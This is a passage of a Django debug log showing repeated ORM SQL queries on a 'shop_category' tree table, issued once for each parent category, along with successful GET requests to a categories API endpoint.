139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:24,428 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:24,430 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:24,433 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:24,436 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:24,438 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:24,441 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:24,443 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:24,446 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:24,448 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:24,451 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:24] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 12:57:25,687 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 12:57:25,695 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 12:57:25,700 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 12:57:25,702 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 12:57:25,705 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 12:57:25,707 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 12:57:25,709 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 12:57:25,712 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 12:57:25,714 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 12:57:25,716 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 12:57:25,720 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 12:57:25] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:03:35,793 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:03:35,799 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:03:35,801 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:03:35,804 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:03:35,806 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:03:35,808 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:03:35,811 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:03:35,814 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:03:35,816 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:03:35,819 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:03:35,821 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:03:35] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:03:39,223 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:03:39,229 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:03:39,231 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:03:39,233 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:03:39,236 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:03:39,238 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:03:39,241 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:03:39,243 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:03:39,245 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:03:39,248 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:03:39,251 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:03:39] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:03:42,285 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:03:42,294 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:03:42,299 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:03:42,303 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:03:42,307 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:03:42,311 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:03:42,315 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:03:42,318 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:03:42,322 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:03:42,326 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:03:42,330 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:03:42] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:03:57,555 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:03:57,560 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:03:57,563 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:03:57,565 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:03:57,567 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 13:03:57,569 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 13:03:57,572 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 13:03:57,574 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 13:03:57,576 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 13:03:57,578 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 13:03:57,580 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 13:03:57] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 13:03:59,992 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 13:03:59,997 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 13:04:00,001 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 13:04:00,003 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 13:04:00,006 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 